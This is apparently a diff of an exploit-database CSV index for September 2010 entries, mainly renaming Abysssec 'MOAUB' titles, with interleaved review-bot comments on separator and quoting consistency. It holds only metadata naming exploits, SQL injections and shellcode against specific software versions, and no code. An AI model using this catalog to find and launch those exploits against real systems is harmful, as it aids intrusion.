+14898,platforms/asp/webapps/14898.txt,"ifnuke - Multiple Vulnerabilities (0day)",2010-09-05,Abysssec,asp,webapps,0
14901,platforms/php/webapps/14901.txt,"Joomla Component Clantools 1.5 - Blind SQL Injection Vulnerability",2010-09-05,Solidmedia,php,webapps,0
14902,platforms/php/webapps/14902.txt,"Joomla Component Clantools 1.2.3 - Multiple Blind SQL Injection Vulnerability",2010-09-05,Solidmedia,php,webapps,0
14904,platforms/linux/dos/14904.txt,"FCrackZip 1.0 - Local Buffer Overflow Proof of Concept",2010-09-05,0x6264,linux,dos,0
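Review bot: The rewritten 14886 description drops the space before the separator, giving `"Movie Maker- Remote Code Execution (MS10-016)"` where every other rewritten row in this hunk uses ` - ` between product and title; it should read `"Movie Maker - Remote Code Execution (MS10-016)"`. A consumer that splits the description on ` - ` to recover the product name will not match this row. The rewritten 14853 row also keeps the typographic quotes around “newclass” while the neighbouring 14982 row uses CSV-escaped ASCII `""pushstring""`; since the line is being touched anyway, normalising to the ASCII form would keep the file's quoting convention uniform.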
@@ -12997,14 +12992,14 @@ id,file,description,date,author,platform,type,port
14911,platforms/php/webapps/14911.sh,"Gantry Framework 3.0.10 (Joomla) Blind SQL Injection Exploit",2010-09-05,jdc,php,webapps,0
14913,platforms/asp/webapps/14913.txt,"DMXReady Members Area Manager Persistent XSS Vulnerability",2010-09-06,"L0rd CrusAd3r",asp,webapps,0
14914,platforms/asp/webapps/14914.txt,"Micronetsoft RV Dealer Website SQL Injection Vulnerability",2010-09-06,"L0rd CrusAd3r",asp,webapps,0
-14915,platforms/php/webapps/14915.txt,"moaub #6 - interphoto gallery Multiple Vulnerabilities",2010-09-06,Abysssec,php,webapps,0
-14916,platforms/windows/dos/14916.py,"MOAUB #6 - HP OpenView NNM webappmon.exe execvp_nc Remote Code Execution",2010-09-06,Abysssec,windows,dos,0
+14915,platforms/php/webapps/14915.txt,"interphoto gallery - Multiple Vulnerabilities",2010-09-06,Abysssec,php,webapps,0
+14916,platforms/windows/dos/14916.py,"HP OpenView NNM - webappmon.exe execvp_nc Remote Code Execution",2010-09-06,Abysssec,windows,dos,0
14919,platforms/asp/webapps/14919.txt,"Micronetsoft Rental Property Management Website SQL Injection Vulnerability",2010-09-06,"L0rd CrusAd3r",asp,webapps,0
14922,platforms/php/webapps/14922.txt,"Joomla Component Aardvertiser 2.1 Free Blind SQL Injection Vulnerability",2010-09-06,"Stephan Sattler",php,webapps,0
14923,platforms/php/webapps/14923.txt,"Wordpress Events Manager Extended Plugin Persistent XSS Vulnerability",2010-09-06,Craw,php,webapps,0
14925,platforms/linux/remote/14925.txt,"weborf <= 0.12.2 - Directory Traversal vulnerability",2010-09-07,Rew,linux,remote,0
-14927,platforms/php/webapps/14927.txt,"moaub #7 - dynpage <= 1.0 - Multiple Vulnerabilities (0day)",2010-09-07,Abysssec,php,webapps,0
-14928,platforms/novell/dos/14928.py,"MOAUB #7 - Novell Netware NWFTPD RMD/RNFR/DELE Argument Parsing Buffer overflow",2010-09-07,Abysssec,novell,dos,0
+14927,platforms/php/webapps/14927.txt,"dynpage <= 1.0 - Multiple Vulnerabilities (0day)",2010-09-07,Abysssec,php,webapps,0
+14928,platforms/novell/dos/14928.py,"Novell Netware - NWFTPD RMD/RNFR/DELE Argument Parsing Buffer Overflow",2010-09-07,Abysssec,novell,dos,0
14931,platforms/php/webapps/14931.php,"java Bridge 5.5 - Directory Traversal vulnerability",2010-09-07,Saxtor,php,webapps,0
14932,platforms/windows/webapps/14932.py,"ColdCalendar 2.06 SQL Injection Exploit",2010-09-07,mr_me,windows,webapps,0
14933,platforms/windows/webapps/14933.txt,"ColdBookmarks 1.22 SQL Injection Vulnerability",2010-09-07,mr_me,windows,webapps,0
@@ -13014,88 +13009,88 @@ id,file,description,date,author,platform,type,port
14938,platforms/windows/dos/14938.txt,"Internet Download Accelerator 5.8 - Remote Buffer Overflow PoC",2010-09-07,eidelweiss,windows,dos,0
14941,platforms/win32/remote/14941.rb,"Integard Home and Pro 2 - Remote HTTP Buffer Overflow Exploit",2010-09-07,"Lincoln, Nullthreat, rick2600",win32,remote,80
14942,platforms/php/webapps/14942.txt,"1024 CMS 2.1.1 - Blind SQL Injection Vulnerability",2010-09-07,"Stephan Sattler",php,webapps,0
-14943,platforms/asp/webapps/14943.txt,"moaub #8 - sirang web-based d-control Multiple Vulnerabilities",2010-09-08,Abysssec,asp,webapps,0
-14944,platforms/windows/local/14944.py,"MOAUB #8 - Microsoft Office Visio DXF File Stack based Overflow",2010-09-08,Abysssec,windows,local,0
+14943,platforms/asp/webapps/14943.txt,"sirang web-based d-control Multiple Vulnerabilities",2010-09-08,Abysssec,asp,webapps,0
+14944,platforms/windows/local/14944.py,"Microsoft Office Visio DXF File Stack based Overflow",2010-09-08,Abysssec,windows,local,0
14947,platforms/bsd/dos/14947.txt,"FreeBSD 8.1/7.3 vm.pmap Kernel Local Race Condition",2010-09-08,"Maksymilian Arciemowicz",bsd,dos,0
-14948,platforms/php/webapps/14948.txt,"moaub #9 - festos cms 2.3b Multiple Vulnerabilities",2010-09-09,Abysssec,php,webapps,0
-14949,platforms/windows/dos/14949.py,"MOAUB #9 - Mozilla Firefox XSLT Sort Remote Code Execution Vulnerability",2010-09-09,Abysssec,windows,dos,0
+14948,platforms/php/webapps/14948.txt,"festos cms 2.3b Multiple Vulnerabilities",2010-09-09,Abysssec,php,webapps,0
+14949,platforms/windows/dos/14949.py,"Mozilla Firefox XSLT Sort Remote Code Execution Vulnerability",2010-09-09,Abysssec,windows,dos,0
14952,platforms/php/webapps/14952.txt,"Visitors Google Map Lite 1.0.1 (FREE) module mod_visitorsgooglemap SQL Injection",2010-09-09,"Chip d3 bi0s",php,webapps,0
-14954,platforms/asp/webapps/14954.txt,"moaub #10 - aradblog Multiple Vulnerabilities",2010-09-09,Abysssec,asp,webapps,0
+14954,platforms/asp/webapps/14954.txt,"aradblog - Multiple Vulnerabilities",2010-09-09,Abysssec,asp,webapps,0
14959,platforms/windows/local/14959.py,"Acoustica MP3 Audio Mixer 2.471 Extended M3U directives SEH",2010-09-09,"Carlos Mario Penagos Hollmann",windows,local,0
14960,platforms/php/webapps/14960.txt,"ES Simple Download 1.0. Local File Inclusion Vulnerability",2010-09-09,Kazza,php,webapps,0
14961,platforms/win32/local/14961.py,"Audiotran 1.4.2.4 SEH Overflow Exploit",2010-09-09,"Abhishek Lyall",win32,local,0
14962,platforms/multiple/webapps/14962.txt,"CS Cart 1.3.3 - (install.php) Cross Site Scripting Vulnerability",2010-09-09,crmpays,multiple,webapps,80
14964,platforms/php/webapps/14964.txt,"Joomla Component (com_jphone) Local File Inclusion Vulnerability",2010-09-10,"Chip d3 bi0s",php,webapps,0
14965,platforms/php/webapps/14965.txt,"fcms 2.2.3 - Remote File Inclusion Vulnerability",2010-09-10,LoSt.HaCkEr,php,webapps,0
-14966,platforms/windows/local/14966.py,"MOAUB #10 - Excel RTD Memory Corruption",2010-09-10,Abysssec,windows,local,0
+14966,platforms/windows/local/14966.py,"Excel RTD - Memory Corruption",2010-09-10,Abysssec,windows,local,0
14967,platforms/windows/dos/14967.txt,"Webkit (Apple Safari < 4.1.2/5.0.2 & Google Chrome < 5.0.375.125) - Memory Corruption",2010-09-10,"Jose A. Vazquez",windows,dos,0
14968,platforms/php/webapps/14968.txt,"symphony 2.0.7 - Multiple Vulnerabilities",2010-09-10,JosS,php,webapps,0
-14969,platforms/asp/webapps/14969.txt,"MOAUB #11 - ASP Nuke SQL Injection Vulnerability",2010-09-11,Abysssec,asp,webapps,0
-14971,platforms/windows/dos/14971.py,"MOAUB #11 - Microsoft Office Word 2007 sprmCMajority Buffer Overflow",2010-09-11,Abysssec,windows,dos,0
+14969,platforms/asp/webapps/14969.txt,"ASP Nuke - SQL Injection Vulnerability",2010-09-11,Abysssec,asp,webapps,0
+14971,platforms/windows/dos/14971.py,"Microsoft Office Word 2007 - sprmCMajority Buffer Overflow",2010-09-11,Abysssec,windows,dos,0
14973,platforms/php/webapps/14973.txt,"piwigo-2.1.2 - Multiple Vulnerabilities",2010-09-11,Sweet,php,webapps,0
14974,platforms/windows/dos/14974.txt,"HP Data Protector Media Operations 6.11 Multiple Modules NULL Pointer Dereference DoS",2010-09-11,d0lc3,windows,dos,0
14976,platforms/linux/remote/14976.txt,"YOPS Web Server Remote Command Execution",2010-09-11,"Rodrigo Escobar",linux,remote,0
14977,platforms/php/webapps/14977.txt,"MyHobbySite 1.01 SQL Injection and Authentication Bypass Vulnerability",2010-09-12,"YuGj VN",php,webapps,0
14979,platforms/php/webapps/14979.txt,"AlstraSoft AskMe Pro 2.1 (forum_answer.php?que_id) SQL Injection Vulnerability",2010-09-12,Amine_92,php,webapps,0
-14980,platforms/asp/webapps/14980.txt,"MOAUB #12 - eshtery CMS SQL Injection Vulnerability",2010-09-12,Abysssec,asp,webapps,0
-14982,platforms/windows/local/14982.py,"MOAUB #12 - Adobe Acrobat and Reader ""pushstring"" Memory Corruption",2010-09-12,Abysssec,windows,local,0
+14980,platforms/asp/webapps/14980.txt,"eshtery CMS - SQL Injection Vulnerability",2010-09-12,Abysssec,asp,webapps,0
+14982,platforms/windows/local/14982.py,"Adobe Acrobat and Reader - ""pushstring"" Memory Corruption",2010-09-12,Abysssec,windows,local,0
14985,platforms/php/webapps/14985.txt,"System Shop (Module aktka) SQL Injection Vulnerability",2010-09-12,secret,php,webapps,0
14986,platforms/php/webapps/14986.txt,"AlstraSoft AskMe Pro 2.1 (profile.php?id) SQL Injection Vulnerability",2010-09-12,CoBRa_21,php,webapps,0
14987,platforms/windows/dos/14987.py,"Kingsoft Antivirus <= 2010.04.26.648 Kernel Buffer Overflow Exploit",2010-09-13,"Lufeng Li",windows,dos,0
14988,platforms/php/webapps/14988.txt,"Group Office 3.5.9 - SQL Injection Vulnerability",2010-09-13,ViciOuS,php,webapps,0
14989,platforms/php/webapps/14989.txt,"osDate (uploadvideos.php) Shell Upload Vulnerability",2010-09-13,Xa7m3d,php,webapps,0
14990,platforms/windows/dos/14990.txt,"AA SMTP Server 1.1 - Crash PoC",2010-09-13,SONIC,windows,dos,0
-14991,platforms/asp/webapps/14991.txt,"MOAUB #13 - Luftguitar CMS Vulnerability: Upload Arbitrary File",2010-09-13,Abysssec,asp,webapps,0
-14992,platforms/windows/dos/14992.py,"MOAUB #13 - RealPlayer FLV Parsing Integer Overflow",2010-09-13,Abysssec,windows,dos,0
+14991,platforms/asp/webapps/14991.txt,"Luftguitar CMS - Upload Arbitrary File Vulnerability",2010-09-13,Abysssec,asp,webapps,0
+14992,platforms/windows/dos/14992.py,"RealPlayer - FLV Parsing Integer Overflow",2010-09-13,Abysssec,windows,dos,0
14995,platforms/php/webapps/14995.txt,"Joomla Component Mosets Tree 2.1.5 Shell Upload Vulnerability",2010-09-13,jdc,php,webapps,0
14996,platforms/php/webapps/14996.txt,"Storyteller CMS (var) Local File Inclusion Vulnerability",2010-09-13,"BorN To K!LL",php,webapps,0
14997,platforms/php/webapps/14997.txt,"UCenter Home 2.0 - SQL Injection Vulnerability",2010-09-13,KnocKout,php,webapps,0
14998,platforms/php/webapps/14998.txt,"Joomla Component (com_jgen) SQL Injection Vulnerability",2010-09-14,**RoAd_KiLlEr**,php,webapps,0
-14999,platforms/asp/webapps/14999.txt,"moaub #14 - freediscussionforums 1.0 - Multiple Vulnerabilities",2010-09-14,Abysssec,asp,webapps,0
-15001,platforms/windows/remote/15001.html,"MOAUB #14 - Novell iPrint Client Browser Plugin ExecuteRequest debug Stack Overflow",2010-09-14,Abysssec,windows,remote,0
+14999,platforms/asp/webapps/14999.txt,"freediscussionforums 1.0 - Multiple Vulnerabilities",2010-09-14,Abysssec,asp,webapps,0
+15001,platforms/windows/remote/15001.html,"Novell iPrint Client Browser Plugin - ExecuteRequest debug Stack Overflow",2010-09-14,Abysssec,windows,remote,0
15004,platforms/php/webapps/15004.pl,"E-Xoopport - Samsara <= 3.1 - (Sections Module) Remote Blind SQL Injection Exploit",2010-09-14,_mRkZ_,php,webapps,0
15005,platforms/multiple/remote/15005.txt,"IBM Lotus Domino iCalendar Email Address Stack Buffer Overflow Vulnerability",2010-09-14,"A. Plaskett",multiple,remote,0
15006,platforms/php/webapps/15006.txt,"eNdonesia 8.4 - SQL Injection Vulnerability",2010-09-15,vYc0d,php,webapps,0
-15008,platforms/windows/dos/15008.py,"MOAUB #15 - Ipswitch Imail Server List Mailer Reply-To Address Memory Corruption",2010-09-15,Abysssec,windows,dos,0
-15011,platforms/php/webapps/15011.txt,"moaub #15 - php microcms 1.0.1 - Multiple Vulnerabilities",2010-09-15,Abysssec,php,webapps,0
+15008,platforms/windows/dos/15008.py,"Ipswitch Imail Server - List Mailer Reply-To Address Memory Corruption",2010-09-15,Abysssec,windows,dos,0
+15011,platforms/php/webapps/15011.txt,"php microcms 1.0.1 - Multiple Vulnerabilities",2010-09-15,Abysssec,php,webapps,0
15013,platforms/windows/local/15013.pl,"MP3 Workstation 9.2.1.1.2 - SEH exploit",2010-09-15,"sanjeev gupta",windows,local,0
15014,platforms/php/webapps/15014.txt,"pixelpost 1.7.3 - Multiple Vulnerabilities",2010-09-15,Sweet,php,webapps,0
15016,platforms/windows/remote/15016.rb,"Integard Pro 2.2.0.9026 - (Win7 ROP-Code Metasploit Module)",2010-09-15,Node,windows,remote,0
15017,platforms/windows/dos/15017.py,"Chalk Creek Media Player 1.0.7 .mp3 and .wma Denial of Service Vulnerability",2010-09-16,"Carlos Mario Penagos Hollmann",windows,dos,0
-15018,platforms/asp/webapps/15018.txt,"moaub #16 - mojoportal Multiple Vulnerabilities",2010-09-16,Abysssec,asp,webapps,0
-15019,platforms/windows/dos/15019.txt,"MOAUB #16 - Microsoft Excel HFPicture Record Parsing Remote Code Execution Vulnerability",2010-09-16,Abysssec,windows,dos,0
+15018,platforms/asp/webapps/15018.txt,"mojoportal - Multiple Vulnerabilities",2010-09-16,Abysssec,asp,webapps,0
+15019,platforms/windows/dos/15019.txt,"Microsoft Excel - HFPicture Record Parsing Remote Code Execution Vulnerability",2010-09-16,Abysssec,windows,dos,0
15022,platforms/windows/local/15022.py,"Honestech VHS to DVD <= 3.0.30 Deluxe Local Buffer Overflow (SEH)",2010-09-16,"Brennon Thomas",windows,local,0
15023,platforms/linux/local/15023.c,"Linux Kernel < 2.6.36-rc4-git2 - x86_64 ia32syscall Emulation Privilege Escalation",2010-09-16,"ben hawkes",linux,local,0
15024,platforms/linux/local/15024.c,"Linux Kernel 2.6.27+ x86_64 compat exploit",2010-09-16,Ac1dB1tCh3z,linux,local,0
15026,platforms/windows/local/15026.py,"BACnet OPC Client Buffer Overflow Exploit",2010-09-16,"Jeremy Brown",windows,local,0
-15027,platforms/windows/dos/15027.py,"MOAUB #17 - Firefox Plugin Parameter EnsureCachedAttrParamArrays Remote Code Execution",2010-09-17,Abysssec,windows,dos,0
-15029,platforms/php/webapps/15029.txt,"moaub #17 - phpmyfamily Multiple Vulnerabilities",2010-09-17,Abysssec,php,webapps,0
+15027,platforms/windows/dos/15027.py,"Firefox Plugin Parameter EnsureCachedAttrParamArrays - Remote Code Execution",2010-09-17,Abysssec,windows,dos,0
+15029,platforms/php/webapps/15029.txt,"phpmyfamily - Multiple Vulnerabilities",2010-09-17,Abysssec,php,webapps,0
15031,platforms/windows/local/15031.py,"DJ Studio Pro 8.1.3.2.1 - SEH Exploit",2010-09-17,"Abhishek Lyall",windows,local,0
15032,platforms/windows/dos/15032.py,"MediaHuman Music Converter 1.0.1 .wav and .mp3 Denial of Service Vulnerability",2010-09-17,modpr0be,windows,dos,0
15033,platforms/windows/local/15033.py,"A-PDF All to MP3 Converter 1.1.0 Universal Local SEH Exploit",2010-09-17,modpr0be,windows,local,0
15034,platforms/windows/dos/15034.txt,"Microsoft Mspaint bmp crash Proof Of Concept",2010-09-18,andrew,windows,dos,0
-15035,platforms/windows/dos/15035.py,"MOAUB #18 - Apple QuickTime FLI LinePacket Remote Code Execution Vulnerability",2010-09-18,Abysssec,windows,dos,0
-15037,platforms/php/webapps/15037.html,"MOAUB #18 - CMSimple - CSRF Vulnerability",2010-09-18,Abysssec,php,webapps,0
+15035,platforms/windows/dos/15035.py,"Apple QuickTime FLI LinePacket - Remote Code Execution Vulnerability",2010-09-18,Abysssec,windows,dos,0
+15037,platforms/php/webapps/15037.html,"CMSimple - CSRF Vulnerability",2010-09-18,Abysssec,php,webapps,0
15039,platforms/php/webapps/15039.txt,"xt:Commerce Gambio 2008 - 2010 ERROR Based SQL Injection ""reviews.php""",2010-09-18,secret,php,webapps,0
15040,platforms/php/webapps/15040.txt,"Joomla Component (com_restaurantguide) Multiple Vulnerabilities",2010-09-18,Valentin,php,webapps,0
15041,platforms/php/webapps/15041.py,"Maian Gallery 2 - Local File Download Vulnerability",2010-09-18,mr_me,php,webapps,0
-15042,platforms/windows/remote/15042.py,"MOAUB #19 - Novell iPrint Client Browser Plugin call-back-url Stack Overflow",2010-09-19,Abysssec,windows,remote,0
-15044,platforms/asp/webapps/15044.txt,"moaub #19 - jmd-cms Multiple Vulnerabilities",2010-09-19,Abysssec,asp,webapps,0
+15042,platforms/windows/remote/15042.py,"Novell iPrint Client Browser Plugin - call-back-url Stack Overflow",2010-09-19,Abysssec,windows,remote,0
+15044,platforms/asp/webapps/15044.txt,"jmd-cms - Multiple Vulnerabilities",2010-09-19,Abysssec,asp,webapps,0
15046,platforms/php/webapps/15046.txt,"Fashione E-Commerce Webshop Multiple SQL Injection Vulnerability",2010-09-19,secret,php,webapps,0
15047,platforms/windows/local/15047.rb,"Audiotran 1.4.2.4 SEH Overflow Exploit (DEP Bypass)",2010-09-19,"Muhamad Fadzil Ramli",windows,local,0
15048,platforms/windows/remote/15048.txt,"smartermail 7.1.3876 - Directory Traversal vulnerability",2010-09-19,sqlhacker,windows,remote,0
15049,platforms/php/webapps/15049.txt,"BoutikOne 1.0 - SQL Injection Vulnerability",2010-09-19,BrOx-Dz,php,webapps,0
15050,platforms/php/webapps/15050.txt,"Opencart 1.4.9.1 - Remote File Upload Vulnerability",2010-09-19,Net.Edit0r,php,webapps,0
15054,platforms/linux/dos/15054.rb,"RarCrack 0.2 - Buffer Overflow Proof Of Concept",2010-09-19,The_UnKn@wn,linux,dos,0
-15056,platforms/windows/remote/15056.py,"MOAUB #20 - Java CMM readMabCurveData Stack Overflow",2010-09-20,Abysssec,windows,remote,0
-15058,platforms/asp/webapps/15058.html,"MOAUB #20 - VWD-CMS CSRF Vulnerability",2010-09-20,Abysssec,asp,webapps,0
+15056,platforms/windows/remote/15056.py,"Java CMM readMabCurveData - Stack Overflow",2010-09-20,Abysssec,windows,remote,0
+15058,platforms/asp/webapps/15058.html,"VWD-CMS - CSRF Vulnerability",2010-09-20,Abysssec,asp,webapps,0
15060,platforms/php/webapps/15060.txt,"LightNEasy Cms 3.2.1 - Blind SQL Injection Vulnerability",2010-09-20,Solidmedia,php,webapps,0
15061,platforms/windows/dos/15061.txt,"microsoft drm technology (msnetobj.dll) activex Multiple Vulnerabilities",2010-09-20,"Asheesh kumar Mani Tripathi",windows,dos,0
15062,platforms/linux/dos/15062.txt,"RarCrack 0.2 - ""filename"" init() .bss PoC",2010-09-20,Stoke,linux,dos,0
15063,platforms/windows/shellcode/15063.c,"win32/xp sp3 (Tr) Add Admin Account Shellcode 127 bytes",2010-09-20,ZoRLu,windows,shellcode,0
15064,platforms/php/webapps/15064.txt,"primitive cms 1.0.9 - Multiple Vulnerabilities",2010-09-20,"Stephan Sattler",php,webapps,0
-15065,platforms/windows/dos/15065.txt,"MOAUB #21 - Microsoft Excel WOPT Record Parsing Heap Memory Corruption",2010-09-21,Abysssec,windows,dos,0
-15067,platforms/asp/webapps/15067.txt,"MOAUB #21 - Personal.Net Portal Multiple Vulnerabilities",2010-09-21,Abysssec,asp,webapps,0
+15065,platforms/windows/dos/15065.txt,"Microsoft Excel - WOPT Record Parsing Heap Memory Corruption",2010-09-21,Abysssec,windows,dos,0
+15067,platforms/asp/webapps/15067.txt,"Personal.Net Portal - Multiple Vulnerabilities",2010-09-21,Abysssec,asp,webapps,0
15069,platforms/windows/local/15069.py,"Acoustica Audio Converter Pro 1.1 (build 25) Heap Overflow(.mp3.wav.ogg.wma) PoC",2010-09-21,"Carlos Mario Penagos Hollmann",windows,local,0
15070,platforms/php/webapps/15070.txt,"ibPhotohost 1.1.2 - SQL Injection",2010-09-21,fred777,php,webapps,0
15071,platforms/windows/remote/15071.txt,"Softek Barcode Reader Toolkit ActiveX 7.1.4.14 (SoftekATL.dll) Buffer Overflow PoC",2010-09-21,LiquidWorm,windows,remote,0
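Review bot: The rewritten 14943, 14944, 14948 and 14949 descriptions strip the "MOAUB #n - " prefix but, unlike every other rewritten row in this hunk, do not put the ` - ` separator between product and title, so they read `"sirang web-based d-control Multiple Vulnerabilities"` and `"festos cms 2.3b Multiple Vulnerabilities"` rather than `"sirang web-based d-control - Multiple Vulnerabilities"` and `"festos cms 2.3b - Multiple Vulnerabilities"`. The same omission appears on the 15096 row in the following hunk (`"Microsoft MPEG Layer-3 Audio Decoder Division By Zero"`). Since the stated purpose of these edits appears to be normalising the description format, those five rows would be the ones a title parser keyed on ` - ` would still fail to split.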
@@ -13103,38 +13098,38 @@ id,file,description,date,author,platform,type,port
15073,platforms/windows/remote/15073.rb,"Novell iPrint Client ActiveX Control 'debug' Buffer Overflow Exploit",2010-09-21,Trancer,windows,remote,0
15074,platforms/linux/local/15074.sh,"Ubuntu Linux 'mountall' Local Privilege Escalation Vulnerability",2010-09-21,fuzz,linux,local,0
15075,platforms/php/webapps/15075.txt,"wpQuiz 2.7 - Authentication Bypass Vulnerability",2010-09-21,KnocKout,php,webapps,0
-15076,platforms/windows/dos/15076.py,"MOAUB #22 - Adobe Shockwave Director tSAC Chunk Memory Corruption",2010-09-22,Abysssec,windows,dos,0
-15078,platforms/asp/webapps/15078.txt,"MOAUB #22 - gausCMS Multiple Vulnerabilities",2010-09-22,Abysssec,asp,webapps,0
+15076,platforms/windows/dos/15076.py,"Adobe Shockwave Director tSAC - Chunk Memory Corruption",2010-09-22,Abysssec,windows,dos,0
+15078,platforms/asp/webapps/15078.txt,"gausCMS - Multiple Vulnerabilities",2010-09-22,Abysssec,asp,webapps,0
15080,platforms/php/webapps/15080.txt,"Skybluecanvas 1.1-r248 - Cross Site Request Forgery Vulnirability",2010-09-22,Sweet,php,webapps,0
15081,platforms/windows/local/15081.rb,"MP3 Workstation 9.2.1.1.2 - SEH exploit (MSF)",2010-09-22,Madjix,windows,local,0
15082,platforms/php/webapps/15082.txt,"BSI Hotel Booking System Admin 1.4 & 2.0 - Login Bypass Vulnerability",2010-09-22,K-159,php,webapps,0
15084,platforms/php/webapps/15084.txt,"Joomla TimeTrack Component 1.2.4 - Component Multiple SQL Injection Vulnerabilities",2010-09-22,"Salvatore Fresta",php,webapps,0
15085,platforms/php/webapps/15085.txt,"Joomla Component (com_ezautos) SQL Injection Vulnerability",2010-09-22,Gamoscu,php,webapps,0
-15086,platforms/multiple/dos/15086.py,"MOAUB #23 - Adobe Acrobat Reader and Flash 'newfunction' Remote Code Execution Vulnerability",2010-09-23,Abysssec,multiple,dos,0
-15088,platforms/windows/dos/15088.txt,"MOAUB #23 - Microsoft Excel HFPicture Record Parsing Memory Corruption (0day)",2010-09-23,Abysssec,windows,dos,0
+15086,platforms/multiple/dos/15086.py,"Adobe Acrobat Reader and Flash - 'newfunction' Remote Code Execution Vulnerability",2010-09-23,Abysssec,multiple,dos,0
+15088,platforms/windows/dos/15088.txt,"Microsoft Excel - HFPicture Record Parsing Memory Corruption (0day)",2010-09-23,Abysssec,windows,dos,0
15090,platforms/php/webapps/15090.txt,"WAnewsletter 2.1.2 - SQL Injection Vulnerability",2010-09-23,BrOx-Dz,php,webapps,0
15091,platforms/php/webapps/15091.txt,"GeekLog 1.3.8 (filemgmt) - SQL Injection Vulnerability",2010-09-23,Gamoscu,php,webapps,0
15092,platforms/php/webapps/15092.txt,"OvBB 0.16a - Multiple Local File Inclusion Vulnerabilities",2010-09-23,cOndemned,php,webapps,0
15093,platforms/php/webapps/15093.txt,"Collaborative Passwords Manager 1.07 Multiple Local Include Vulnerabilities",2010-09-24,sh00t0ut,php,webapps,0
-15094,platforms/windows/local/15094.py,"MOAUB #24 - Microsoft Excel OBJ Record Stack Overflow",2010-09-24,Abysssec,windows,local,0
-15096,platforms/windows/dos/15096.py,"MOAUB #24 - Microsoft MPEG Layer-3 Audio Decoder Division By Zero",2010-09-24,Abysssec,windows,dos,0
+15094,platforms/windows/local/15094.py,"Microsoft Excel - OBJ Record Stack Overflow",2010-09-24,Abysssec,windows,local,0
+15096,platforms/windows/dos/15096.py,"Microsoft MPEG Layer-3 Audio Decoder Division By Zero",2010-09-24,Abysssec,windows,dos,0
15098,platforms/php/webapps/15098.txt,"FreePBX <= 2.8.0 Recordings Interface Allows Remote Code Execution",2010-09-24,"Trustwave's SpiderLabs",php,webapps,0
15099,platforms/windows/local/15099.rb,"SnackAmp 3.1.3B - SMP Buffer Overflow Vulnerability (SEH)",2010-09-24,"James Fitts",windows,local,0
15100,platforms/win32/webapps/15100.txt,"Joomla Component (com_elite_experts) SQL Injection Vulnerability",2010-09-24,**RoAd_KiLlEr**,win32,webapps,80
15102,platforms/win32/webapps/15102.txt,"Traidnt UP - Cross-Site Request Forgery Add Admin Account",2010-09-24,"John Johnz",win32,webapps,80
15103,platforms/windows/dos/15103.py,"VMware Workstation <= 7.1.1 VMkbd.sys Denial of Service Exploit",2010-09-25,"Lufeng Li",windows,dos,0
-15104,platforms/windows/dos/15104.py,"MOAUB #25 - Mozilla Firefox CSS font-face Remote Code Execution Vulnerability",2010-09-25,Abysssec,windows,dos,0
-15106,platforms/asp/webapps/15106.txt,"MOAUB #25 - VisualSite CMS 1.3 - Multiple Vulnerabilities",2010-09-25,Abysssec,asp,webapps,0
+15104,platforms/windows/dos/15104.py,"Mozilla Firefox CSS - font-face Remote Code Execution Vulnerability",2010-09-25,Abysssec,windows,dos,0
+15106,platforms/asp/webapps/15106.txt,"VisualSite CMS 1.3 - Multiple Vulnerabilities",2010-09-25,Abysssec,asp,webapps,0
15110,platforms/php/webapps/15110.txt,"E-Xoopport - Samsara <= 3.1 - (eCal module) Blind SQL Injection Exploit",2010-09-25,_mRkZ_,php,webapps,0
-15112,platforms/windows/dos/15112.py,"MOAUB #26 - Microsoft Cinepak Codec CVDecompress Heap Overflow",2010-09-26,Abysssec,windows,dos,0
-15114,platforms/php/webapps/15114.php,"MOAUB #26 - Zenphoto Config Update and Command Execute Vulnerability",2010-09-26,Abysssec,php,webapps,0
+15112,platforms/windows/dos/15112.py,"Microsoft Cinepak Codec CVDecompress - Heap Overflow",2010-09-26,Abysssec,windows,dos,0
+15114,platforms/php/webapps/15114.php,"Zenphoto - Config Update and Command Execute Vulnerability",2010-09-26,Abysssec,php,webapps,0
15116,platforms/windows/shellcode/15116.cpp,"Windows Mobile 6.5 TR (WinCE 5.2) MessageBox Shellcode (ARM)",2010-09-26,"Celil Ünüver",windows,shellcode,0
15118,platforms/asp/webapps/15118.txt,"gokhun asp stok 1.0 - Multiple Vulnerabilities",2010-09-26,KnocKout,asp,webapps,0
15119,platforms/php/webapps/15119.txt,"PEEL Premium 5.71 SQL Injection Vulnerability",2010-09-26,KnocKout,php,webapps,0
15120,platforms/cfm/webapps/15120.txt,"Blue River Mura CMS Directory Traversal",2010-09-26,mr_me,cfm,webapps,0
15121,platforms/php/webapps/15121.txt,"pbboard 2.1.1 - Multiple Vulnerabilities",2010-09-27,JIKO,php,webapps,0
-15122,platforms/windows/dos/15122.html,"MOAUB #27 - Microsoft Internet Explorer MSHTML Findtext Processing Issue",2010-09-27,Abysssec,windows,dos,0
-15124,platforms/asp/webapps/15124.txt,"MOAUB #27 - ndCMS SQL Injection Vulnerability",2010-09-27,Abysssec,asp,webapps,0
+15122,platforms/windows/dos/15122.html,"Microsoft Internet Explorer - MSHTML Findtext Processing Issue",2010-09-27,Abysssec,windows,dos,0
+15124,platforms/asp/webapps/15124.txt,"ndCMS - SQL Injection Vulnerability",2010-09-27,Abysssec,asp,webapps,0
15126,platforms/php/webapps/15126.txt,"Entrans SQL Injection Vulnerablility",2010-09-27,keracker,php,webapps,0
15128,platforms/win32/webapps/15128.txt,"Allpc 2.5 osCommerce SQL/XSS Multiple Vulnerabilities",2010-09-27,**RoAd_KiLlEr**,win32,webapps,80
15130,platforms/cgi/webapps/15130.sh,"Barracuda Networks Spam & Virus Firewall <= 4.1.1.021 Remote Configuration Retrieval",2010-09-27,ShadowHatesYou,cgi,webapps,0
@@ -13143,14 +13138,14 @@ id,file,description,date,author,platform,type,port
 15134,platforms/windows/local/15134.rb,"Digital Music Pad 8.2.3.3.4 - SEH overflow Metasploit Module",2010-09-27,"Abhishek Lyall",windows,local,0
 15135,platforms/php/webapps/15135.txt,"Car Portal 2.0 - BLIND SQL Injection Vulnerability",2010-09-27,**RoAd_KiLlEr**,php,webapps,0
 15136,platforms/windows/shellcode/15136.cpp,"Windows Mobile 6.5 TR Phone Call Shellcode",2010-09-27,"Celil Ünüver",windows,shellcode,0
-15139,platforms/asp/webapps/15139.txt,"MOAUB #28 - AtomatiCMS Upload Arbitrary File Vulnerability",2010-09-28,Abysssec,asp,webapps,0
-15141,platforms/php/webapps/15141.txt,"MOAUB #28 - JE CMS 1.0.0 Bypass Authentication by SQL Injection Vulnerability",2010-09-28,Abysssec,php,webapps,0
+15139,platforms/asp/webapps/15139.txt,"AtomatiCMS - Upload Arbitrary File Vulnerability",2010-09-28,Abysssec,asp,webapps,0
